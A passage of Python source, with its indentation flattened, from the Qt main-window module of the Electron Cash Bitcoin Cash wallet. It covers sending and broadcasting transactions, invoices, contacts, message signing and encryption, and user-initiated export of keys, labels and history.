def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
msg = ack_msg
if ack_status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
status = True
else:
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
self.show_error(_('Invalid bitcoincash URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = QLineEdit()
cash_address.setReadOnly(True)
legacy_address = QLineEdit()
legacy_address.setReadOnly(True)
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
grid.addWidget(QLabel(_('Address to convert')), 0, 0)
grid.addWidget(source_address, 0, 1)
grid.addWidget(QLabel(_('Cash address')), 1, 0)
grid.addWidget(cash_address, 1, 1)
grid.addWidget(QLabel(_('Legacy address')), 2, 0)
grid.addWidget(legacy_address, 2, 1)
w.setLayout(grid)
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(addresses))):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=self.password_dialog,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
sb.addPermanentWidget(self.addr_converter_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electron Cash, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + self.msg_sign)
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx)
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electroncash import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoincash URI
if data.lower().startswith(NetworkConstants.CASHADDR_PREFIX + ':'):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electroncash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr.to_ui_string()] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
if type(data) is not dict or len(data) and not all(type(v) is str for v in next(iter(d))):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.export_history(fx=self.fx)
lines = []
for item in history:
if is_csv:
lines.append([item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['date']])
else:
lines.append(item)
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText())
def enable_sweep():
sweep_button.setEnabled(bool(get_address_text()
and get_priv_keys()))
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
if not d.exec_():
return
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_priv_keys(), self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
